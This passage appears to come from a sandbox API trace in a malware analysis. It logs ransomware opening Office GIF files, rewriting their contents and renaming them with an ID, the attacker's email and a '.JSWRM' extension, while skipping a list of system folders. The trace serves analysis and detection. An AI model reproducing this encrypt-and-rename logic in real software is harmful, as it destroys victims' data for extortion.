lpString2="msocache") returned 1 [0120.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0120.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR46F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR46F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR46F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0120.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0120.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR46F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR46F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR46F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0120.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0120.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0120.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0120.602] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR46F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir46f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.603] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=5148) returned 1 [0120.603] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1410) returned 0x24e1d8 [0120.603] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1410, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x1410, lpOverlapped=0x0) returned 1 [0120.605] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.605] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1410, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x1410, lpOverlapped=0x0) returned 1 [0120.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.605] CloseHandle (hObject=0x314) returned 1 [0120.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0120.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0120.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0120.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0120.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0120.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0120.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0120.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0120.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.605] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR46F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir46f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR46F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir46f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0120.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0120.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0120.606] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae23ccd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae23ccd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae23ccd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7517, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR47B.GIF", cAlternateFileName="")) returned 1 [0120.606] lstrcmpiW (lpString1="ZPDIR47B.GIF", lpString2=".") returned 1 [0120.606] lstrcmpiW (lpString1="ZPDIR47B.GIF", lpString2="..") returned 1 [0120.606] lstrcmpiW (lpString1="ZPDIR47B.GIF", lpString2="...") returned 1 [0120.606] lstrcmpiW (lpString1="ZPDIR47B.GIF", lpString2="windows") returned 1 [0120.606] lstrcmpiW (lpString1="ZPDIR47B.GIF", lpString2="recovery") returned 1 [0120.606] lstrcmpiW (lpString1="ZPDIR47B.GIF", lpString2="perflogs") returned 1 [0120.606] lstrcmpiW (lpString1="ZPDIR47B.GIF", lpString2="documents and settings") returned 1 [0120.606] lstrcmpiW (lpString1="ZPDIR47B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.606] lstrcmpiW (lpString1="ZPDIR47B.GIF", lpString2="system volume information") returned 1 [0120.606] lstrcmpiW (lpString1="ZPDIR47B.GIF", lpString2="msocache") returned 1 [0120.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0120.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR47B.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR47B.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR47B.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0120.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0120.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR47B.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR47B.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR47B.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0120.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0120.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0120.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0120.607] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR47B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir47b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.607] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=29975) returned 1 [0120.608] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7510) returned 0x24e1d8 [0120.608] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x7510, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x7510, lpOverlapped=0x0) returned 1 [0120.611] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.611] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x7510, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x7510, lpOverlapped=0x0) returned 1 [0120.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.611] CloseHandle (hObject=0x314) returned 1 [0120.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0120.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0120.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0120.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0120.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0120.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0120.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.612] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR47B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir47b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR47B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir47b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0120.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0120.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0120.613] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae23ccd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae23ccd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae23ccd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x539e, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR47F.GIF", cAlternateFileName="")) returned 1 [0120.613] lstrcmpiW (lpString1="ZPDIR47F.GIF", lpString2=".") returned 1 [0120.613] lstrcmpiW (lpString1="ZPDIR47F.GIF", lpString2="..") returned 1 [0120.613] lstrcmpiW (lpString1="ZPDIR47F.GIF", lpString2="...") returned 1 [0120.613] lstrcmpiW (lpString1="ZPDIR47F.GIF", lpString2="windows") returned 1 [0120.613] lstrcmpiW (lpString1="ZPDIR47F.GIF", lpString2="recovery") returned 1 [0120.613] lstrcmpiW (lpString1="ZPDIR47F.GIF", lpString2="perflogs") returned 1 [0120.613] lstrcmpiW (lpString1="ZPDIR47F.GIF", lpString2="documents and settings") returned 1 [0120.613] lstrcmpiW (lpString1="ZPDIR47F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.613] lstrcmpiW (lpString1="ZPDIR47F.GIF", lpString2="system volume information") returned 1 [0120.613] lstrcmpiW (lpString1="ZPDIR47F.GIF", lpString2="msocache") returned 1 [0120.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0120.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR47F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR47F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR47F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0120.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0120.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR47F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR47F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR47F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0120.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0120.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0120.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0120.613] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR47F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir47f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.614] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=21406) returned 1 [0120.614] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5390) returned 0x24e1d8 [0120.614] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x5390, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x5390, lpOverlapped=0x0) returned 1 [0120.617] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.617] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x5390, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x5390, lpOverlapped=0x0) returned 1 [0120.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.617] CloseHandle (hObject=0x314) returned 1 [0120.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0120.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0120.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0120.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0120.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0120.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0120.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0120.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0120.617] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR47F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir47f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR47F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir47f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0120.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0120.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0120.618] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x67f9, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR48B.GIF", cAlternateFileName="")) returned 1 [0120.618] lstrcmpiW (lpString1="ZPDIR48B.GIF", lpString2=".") returned 1 [0120.618] lstrcmpiW (lpString1="ZPDIR48B.GIF", lpString2="..") returned 1 [0120.618] lstrcmpiW (lpString1="ZPDIR48B.GIF", lpString2="...") returned 1 [0120.618] lstrcmpiW (lpString1="ZPDIR48B.GIF", lpString2="windows") returned 1 [0120.618] lstrcmpiW (lpString1="ZPDIR48B.GIF", lpString2="recovery") returned 1 [0120.619] lstrcmpiW (lpString1="ZPDIR48B.GIF", lpString2="perflogs") returned 1 [0120.619] lstrcmpiW (lpString1="ZPDIR48B.GIF", lpString2="documents and settings") returned 1 [0120.619] lstrcmpiW (lpString1="ZPDIR48B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.619] lstrcmpiW (lpString1="ZPDIR48B.GIF", lpString2="system volume information") returned 1 [0120.619] lstrcmpiW (lpString1="ZPDIR48B.GIF", lpString2="msocache") returned 1 [0120.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0120.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR48B.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR48B.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR48B.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0120.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0120.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR48B.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR48B.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR48B.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 